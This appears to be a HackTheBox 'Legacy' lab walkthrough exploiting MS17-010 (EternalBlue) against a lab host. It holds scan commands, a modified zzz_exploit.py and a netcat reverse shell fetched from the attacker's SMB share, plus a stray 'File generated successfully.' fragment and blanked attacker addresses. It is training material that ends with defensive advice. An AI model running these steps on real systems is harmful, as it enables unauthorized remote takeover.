Share
## https://sploitus.com/exploit?id=D41C1873-5069-5079-AFB8-B3681BD52805
# HackTheBox: Legacy Writeup
An elegant, professional walkthrough demonstrating the exploitation of the **MS17-010 (EternalBlue)** vulnerability on a legacy Windows system. This writeup is structured to highlight offensive security methodologies, operational efficiency, and precise troubleshooting.

---

## Technical Overview
* **Target OS:** Windows (Legacy)
* **IP Address:** `10.10.10.4`
* **Difficulty:** Easy
* **Core Vulnerability:** MS17-010 (EternalBlue / SMBv1 Remote Code Execution)
* **Objective:** Gain NT AUTHORITY\\SYSTEM access and retrieve user/root flags.

---

## 1. Enumeration & Reconnaissance

The initial phase begins with an aggressive, full-port TCP SYN scan to locate active services while skipping host discovery (`-Pn`) and DNS resolution (`-n`) to optimize execution speed.


```

```text
File generated successfully.

```bash
nmap -n -Pn -sS -p- --min-rate 5000 10.10.10.4

```

### Scan Results

The reconnaissance reveals three highly characteristic open ports, pointing immediately toward standard Microsoft services:

* **Port 135:** MSRPC
* **Port 139:** NetBIOS-SSN
* **Port 445:** Microsoft-DS (SMB)

### Vulnerability Assessment

Given the presence of SMB (`445`) on a legacy Windows asset, we run Nmap's targeted NSE scripts to evaluate the system's susceptibility to known critical exploits.

```bash
nmap -p135,139,445 --script="safe and vuln" 10.10.10.4

```

* **Finding:** The system responds as highly vulnerable to the **MS17-010** critical security flaw, making SMB our primary attack vector.

---

## 2. Environment Setup & Dependency Resolution

To achieve Remote Code Execution reliably without relying on Metasploit, we utilize Worawit's public exploit suite.

```bash
git clone [https://github.com/worawit/ms17-010](https://github.com/worawit/ms17-010)
cd ms17-010

```

### Troubleshooting Legacy Python Dependencies

The original exploit code requires Python 2.x and specific versions of the `impacket` framework. To prevent compilation errors or missing module flags, the local environment must be prepared precisely:

```bash
# Upgrade package managers for Python 2
python2 -m pip install --upgrade setuptools pip

# Install the exact compatible Impacket library version
pip2 install impacket==0.9.24

```

With the environment stable, running `python2 checker.py 10.10.10.4` safely confirms the precise named pipes available for exploitation (e.g., `spoolss`).

---

## 3. Weaponization & Proof of Concept (PoC)

Before attempting a fully interactive reverse shell, it is critical to verify arbitrary command execution (Code Execution verification).

We modify the exploit script (`zzz_exploit.py`) inside the main execution block to substitute the default command with an ICMP echo request (ping) back to our attack interface:

```python
# Modified line within zzz_exploit.py
service_exec(conn, r'cmd /c ping -n 4 ')

```

To capture this interaction, we start an ICMP listener on our local host:

```bash
tcpdump -i tun0 icmp -n

```

Executing the exploit triggers the target machine to send outbound ICMP packets to our machine, confirming **successful unauthenticated Remote Code Execution**.

---

## 4. Exploitation & Post-Exploitation

### Staging the Payload

To establish an interactive reverse shell, we choose to transfer a clean standalone `nc.exe` (Netcat) binary to the target.

1. **Locate and copy the binary locally:**
```bash
cp /usr/share/seclists/Web-Shells/FuzzDB/nc.exe .

```


2. **Deploy an Impacket SMB Server to host the file:**
We initialize a local SMB share mapping our current working directory, allowing the victim host to retrieve the file over network shares.
```bash
sudo impacket-smbserver tools .

```



### Modifying Exploit for Shell Access

We adjust `zzz_exploit.py` again to instruct the target to execute our hosted `nc.exe` binary back to our listening port, attaching a command shell session (`cmd.exe`).

```bash
nano zzz_exploit.py

```

```python
# Updated service execution block
service_exec(conn, r'cmd /c \\\tools\nc.exe -e cmd  4444')

```

### Catching the Shell

Set up a Netcat listener on your machine to intercept the incoming shell connection:

```bash
nc -lvnp 4444

```

Execute the finalized exploit against the vulnerable target using the discovered `spoolss` named pipe:

```bash
python2 zzz_exploit.py 10.10.10.4 spoolss

```

---

## 5. Privilege Escalation & Flag Retrieval

Upon catching the connection, we immediately find ourselves inside a high-privilege context, eliminating the need for local privilege escalation:

```cmd
C:\\WINDOWS\\system32> whoami
nt authority\\system

```

### Looting Flags

Navigating legacy Windows filesystems requires utilizing short-name conventions (`DOCUME~1` for `Documents and Settings`) to circumvent directory spacing issues:

```cmd
cd C:\\
cd DOCUME~1

:: Access user flag
type John\\Desktop\\user.txt

:: Access root flag
type Administrator\\Desktop\\root.txt

```

---

### Key Takeaways & Defensive Recommendations

1. **Legacy Protocol Risk:** Leaving SMBv1 enabled exposes systems directly to unauthenticated remote code execution.
2. **Patch Management:** This exploit highlights the extreme risk of deferred patching cycles on legacy operating infrastructure. Ensure **MS17-010** updates are deployed across all Windows systems.
3. **Network Segmentation:** High-risk protocols like SMB (port 445) should never be exposed directly to untrusted networks without robust perimeter firewall rules.